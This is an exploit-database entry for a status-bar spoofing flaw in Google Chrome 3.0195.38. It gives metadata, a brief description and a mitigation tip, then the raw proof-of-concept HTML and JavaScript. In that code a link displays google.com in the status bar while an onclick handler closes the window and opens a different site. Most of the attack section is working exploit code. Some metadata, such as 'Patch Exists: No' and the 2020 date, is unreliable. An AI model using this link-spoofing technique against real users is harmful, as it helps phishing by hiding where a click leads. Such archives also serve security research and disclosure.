header-logo
Suggest Exploit
vendor:
Chrome
by:
599eme Man
8.8
CVSS
HIGH
Status Bar Obfuscation
200
CWE
Product Name: Chrome
Affected Version From: 3.0195.38
Affected Version To: 3.0195.38
Patch Exists: No
Related CWE: N/A
CPE: a:google:chrome:3.0195.38
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2020

Google Chrome 3.0195.38 Status Bar Obfuscation

This exploit is related to Google Chrome 3.0195.38. It is a vulnerability that allows attackers to redirect users to malicious websites by obfuscating the status bar. The exploit involves two steps. First, the attacker opens a new window and then the user is asked to click on a link that redirects them to a malicious website. The malicious website is hidden in the status bar and the user is unaware of the redirection.

Mitigation:

Users should be aware of the potential for malicious websites to be hidden in the status bar. They should also be cautious when clicking on links and should always check the status bar before clicking.
Source

Exploit-DB raw data:

<!--
Google Chrome 3.0195.38 Status Bar Obfuscation
Author : 599eme Man
Contact : flouf@live.fr
-->

<center><h1>Google Chrome 3.0195.38 Status Bar Obfuscation</h1>
<br>
<strong>Author : 599eme Man.<br >
Contact : flouf@live.fr</strong><br >
_______________________________________________________________________
<br>
<br>
<br>

Click 1?) and the 2?) (look the Status bar for the 2?)) and you'll be redirect on Yahoo<br><strong><h1><a href="javascript:window.open(self.location);">1?) Open a new Window</a><br ><a href="http://google.com" onclick="javascript:OB();">2?) http://www.Google.com</a></h1></strong></center>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
                           <font style="font-family:arial;font-size:32px">Look Here<br>
                   | <br>
                  V

<script>

function OB() {

document.write('');
window.close();
window.open('http://yahoo.com');

}

</script>

Navigation

Suggest Exploit

Services By CQR